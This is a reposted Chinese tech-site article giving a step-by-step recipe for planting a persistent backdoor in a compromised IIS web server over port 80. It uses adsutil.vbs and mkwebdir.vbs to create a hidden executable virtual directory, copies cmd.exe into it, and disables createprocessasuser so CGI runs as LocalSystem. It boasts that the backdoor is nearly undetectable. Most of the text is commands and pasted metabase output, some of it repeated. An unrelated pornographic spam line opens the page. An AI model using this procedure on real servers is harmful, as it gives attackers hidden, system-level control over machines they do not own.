自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

真正的IIS永遠的后門解密

作者:佚名
安全 數(shù)據(jù)安全
IIS是比較流行的www服務(wù)器,設(shè)置不當(dāng)漏洞就很多。入侵iis服務(wù)器后留下后門,以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監(jiān)聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務(wù)器端監(jiān)聽遠程的連接控制。

IIS是比較流行的www服務(wù)器,設(shè)置不當(dāng)漏洞就很多。入侵iis服務(wù)器后留下后門,以后就可以隨時控制。一般的后門程序都是打開一個特殊的端口來監(jiān)聽,比如有nc,ntlm,rnc等等都是以一種類telnet的方式在服務(wù)器端監(jiān)聽遠程的連接控制。不過一個比較防范嚴密的www站點(他們的管理員吃了苦頭后)一般通過防火墻對端口進行限制,這樣除了管理員開的端口外,其他端口就不能連接了。但是80端口是不可能關(guān)閉的(如果管理員沒有吃錯藥)。那么我們可以通過在80端口留后門,來開啟永遠的后門。

當(dāng)IIS啟動CGI應(yīng)用程序時,缺省用CreateProcessAsUser API來創(chuàng)建該CGI的新Process,該程序的安全上下文就由啟動該CGI的用戶決定。一般匿名用戶都映射到IUSR_computername這個賬號,當(dāng)然可以由管理員改為其他的用戶。或者由瀏覽器提供一個合法的用戶。兩者的用戶的權(quán)限都是比較低,可能都屬于guest組的成員。其實我們可以修改iis開啟CGI的方式,來提高權(quán)限。我們來看iis主進程本身是運行在localsystem賬號下的,所以我們就可以得到最高localsystem的權(quán)限。

入侵web服務(wù)器后,一般都可以綁定一個cmd到一個端口來遠程控制該服務(wù)器。這時可以有GUI的遠程控制,比如338Array,或者類telnet text方式的控制,比如rnc。nc肯定是可以用的,其實這也足夠了。

1. telnet到服務(wù)器

 

  1. 2. cscript.exe adsutil.vbs enum w3svc/1/root  
  2.  
  3. KeyType : (STRING) "IIsWebVirtualDir"  
  4.  
  5. AppRoot : (STRING) "/LM/W3SVC/1/ROOT"  
  6.  
  7. AppFriendlyName : (STRING) "默認應(yīng)用程序"  
  8.  
  9. AppIsolated : (INTEGER) 2  
  10.  
  11. AccessRead : (BOOLEAN) True  
  12.  
  13. AccessWrite : (BOOLEAN) False  
  14.  
  15. AccessExecute : (BOOLEAN) False  
  16.  
  17. AccessScript : (BOOLEAN) True  
  18.  
  19. AccessSource : (BOOLEAN) False  
  20.  
  21. AccessNoRemoteRead : (BOOLEAN) False  
  22.  
  23. AccessNoRemoteWrite : (BOOLEAN) False  
  24.  
  25. AccessNoRemoteExecute : (BOOLEAN) False  
  26.  
  27. AccessNoRemoteScript : (BOOLEAN) False 

 

 

  1. HttpErrors : (LIST) (32 Items)  
  2.  
  3. "400,*,FILE,C:WINNThelpiisHelpcommon400.htm"  
  4.  
  5. "401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"  
  6.  
  7. "401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"  
  8.  
  9. "401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"  
  10.  
  11. "401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"  
  12.  
  13. "401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm" 

 

 

  1. FrontPageWeb : (BOOLEAN) True  
  2.  
  3. Path : (STRING) "c:inetpubwwwroot"  
  4.  
  5. AccessFlags : (INTEGER) 513  
  6.  
  7. [/w3svc/1/root/localstart.asp]  
  8.  
  9. [/w3svc/1/root/_vti_pvt]  
  10.  
  11. [/w3svc/1/root/_vti_log]  
  12.  
  13. [/w3svc/1/root/_private]  
  14.  
  15. [/w3svc/1/root/_vti_txt]  
  16.  
  17. [/w3svc/1/root/_vti_script]  
  18.  
  19. [/w3svc/1/root/_vti_cnf]  
  20.  
  21. [/w3svc/1/root/_vti_bin] 

 

不要告訴我你不知道上面的輸出是什么!現(xiàn)在我們心里已經(jīng)有底了,是不是!呵呵 管理員要倒霉了

  1. 3. mkdir c:inetpubwwwrootdir1  
  2.  
  3. 4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1" 

 

這樣就建好了一個虛目錄:Virtual Dir1,你可以用 1 的命令看一下

5. 接下來要改變一下Virtual Dir1的屬性為execute

 

  1. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:  
  2.  
  3. cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s: 

 

現(xiàn)在你已經(jīng)可以upload 內(nèi)容到該目錄,并且可以運行。你也可以把cmd.exe net.exe直接拷貝到虛擬目錄的磁盤目錄中。 bitsCN_com

6. 以下命令通過修改iis metabase 來迫使iis以本身的安全環(huán)境來創(chuàng)建新的CGI process

 

  1. Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false  
  2.  
  3. 注釋:cscript windows script host. bitscn.com  
  4.  
  5. adsutil.vbs windows iis administration script  
  6.  
  7. 后面是 iis metabase path 

 

這樣的后門幾乎是無法查出來的,除非把所有的虛目錄察看一遍

 

  1. "403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"  
  2.  
  3. "403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"  
  4.  
  5. "403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"  
  6.  
  7. "403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"  
  8.  
  9. "403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"  
  10.  
  11. "403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"  
  12.  
  13. "403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"  
  14.  
  15. "403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"  
  16.  
  17. "403,Array,FILE,C:WINNThelpiisHelpcommon403-Array.htm"  
  18.  
  19. "403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"  
  20.  
  21. "403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"  
  22.  
  23. "403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"  
  24.  
  25. "403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"  
  26.  
  27. "403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"  
  28.  
  29. "403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"  
  30.  
  31. "403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm" "404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"  
  32.  
  33. "405,*,FILE,C:WINNThelpiisHelpcommon405.htm"  
  34.  
  35. "406,*,FILE,C:WINNThelpiisHelpcommon406.htm"  
  36.  
  37. "407,*,FILE,C:WINNThelpiisHelpcommon407.htm"  
  38.  
  39. "412,*,FILE,C:WINNThelpiisHelpcommon412.htm"  
  40.  
  41. "414,*,FILE,C:WINNThelpiisHelpcommon414.htm"  
  42.  
  43. "500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"  
  44.  
  45. "500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"  
  46.  
  47. "500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"  
  48.  
  49. "500,100,URL,/iisHelp/common/500-100.asp" 

IIS的后門解密就為大家介紹完了,希望大家已經(jīng)掌握。

【編輯推薦】

  1. 詳細解析數(shù)據(jù)加密
  2. 內(nèi)部網(wǎng)中的密碼管理
  3. 探討ECC加密被破譯的可能性
  4. 信息安全的核心之密碼技術(shù) 上
責(zé)任編輯:佚名 來源: 網(wǎng)絡(luò)轉(zhuǎn)載
IIS后門
相關(guān)推薦

2021-01-22 16:02:29

加密貨幣數(shù)字貨幣瑞銀

2011-11-14 13:35:25

云存儲云計算

2016-09-19 08:57:48

2020-02-20 10:50:30

多數(shù)人不會真正成功

2016-01-18 10:49:51

浪潮SAP

2022-07-27 11:26:56

惡意軟件漏洞網(wǎng)絡(luò)攻擊

2011-02-22 13:32:03

2011-11-25 15:34:33

2023-01-06 08:42:02

學(xué)習(xí)訓(xùn)練

2019-07-31 08:30:24

物聯(lián)網(wǎng)電池能源

2015-09-01 10:29:44

數(shù)據(jù)安全

2021-07-14 08:00:12

DubboRSocket 協(xié)議

2010-05-19 19:10:42

2016-10-17 09:20:20

2014-11-25 09:44:43

SDN

2010-05-12 17:09:48

2014-03-06 17:52:25

2018-01-11 09:51:34

2013-11-06 10:12:26

2010-09-29 15:20:29

點贊
收藏

51CTO技術(shù)棧公眾號